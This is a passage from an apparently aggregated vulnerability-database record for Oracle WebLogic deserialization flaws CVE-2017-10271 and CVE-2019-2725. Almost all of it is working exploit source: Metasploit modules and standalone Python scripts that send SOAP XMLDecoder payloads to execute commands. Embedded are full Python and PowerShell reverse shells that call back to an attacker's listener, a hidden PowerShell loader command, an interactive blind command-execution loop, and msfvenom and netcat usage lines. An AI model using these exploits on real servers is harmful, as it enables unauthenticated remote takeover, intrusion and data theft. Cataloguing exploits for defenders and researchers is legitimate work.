'2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']\n ],\n 
'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => 'Apr 23 2019'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),\n OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(datastore['WSPATH']),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status(\"Generating payload...\")\n 
case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << %Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n uri = normalize_uri(datastore['WSPATH'])\n if uri.nil?\n datastore['URIPATH'] = 
\"http://#{RHOST}:#{RPORT}/\"\n end\n\n print_status(\"Sending payload...\")\n\n begin\n res = send_request_cgi(\n 'uri' => uri,\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32663", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. 
E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def 
cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: 
{lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, 
payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-30T00:00:00", "type": "exploitpack", "title": "Oracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-04-30T00:00:00", "id": "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "href": "", "sourceData": 
"#!/usr/bin/python\n\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\n# Date: 30/04/2019\n# Exploit Author: Avinash Kumar Thapa\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\n# Tested on:\n\t#OS: Windows 2012 R2 (Build 9600).\n\t#Architecture : x64\n\t#System Language : en_US\n\n\n# CVE : CVE-2019-2725\n\n\n# Script Usage:\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\n# Add the powershell command in the variable\n\n__author__ = \"Avinash Kumar Thapa\"\n__description__ = \"\"\"\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. 
Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\n\nCREDIT STATEMENT:\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\n\nBadcode of Knownsec 404 Team: CVE-2019-2725\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\nZengShuai Hao: CVE-2019-2725\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\n\n\"\"\"\n\nimport requests\nimport sys\n\nprint \"Exploit Written by Avinash Kumar Thapa\"\n\n\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 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\"\n\nurl = sys.argv[1]\n\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n 
<asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\nresponse = requests.post(url, headers=request_headers, data=data)\nprint \"status_code:%s\" % str(response.status_code)\nprint(response)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. 
\n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext 
xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. \n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. 
This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. 
